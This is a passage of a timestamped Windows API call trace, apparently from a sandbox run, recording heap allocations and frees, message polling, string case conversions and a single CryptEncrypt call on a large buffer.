hHeap=0x25c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0198.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0198.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0198.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0198.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0198.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0198.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.569] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.570] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.570] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.570] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0198.571] CharLowerBuffW (in: lpsz="byte[99040]", cchLength=0xb | out: lpsz="byte[99040]") returned 0xb [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0198.571] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.573] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.573] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.573] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.573] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.573] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.573] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.574] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34e2820*, pdwDataLen=0x8bef68*=0x182dd, dwBufLen=0x182e0 | out: pbData=0x34e2820*, pdwDataLen=0x8bef68*=0x182e0) returned 1 [0198.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0198.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0198.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0198.575] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.577] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.577] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0198.577] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.577] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.577] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.577] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.577] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.577] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.577] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.578] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.578] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.578] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.578] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.578] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.578] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.578] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.578] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.579] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.579] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.579] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.579] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.579] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, 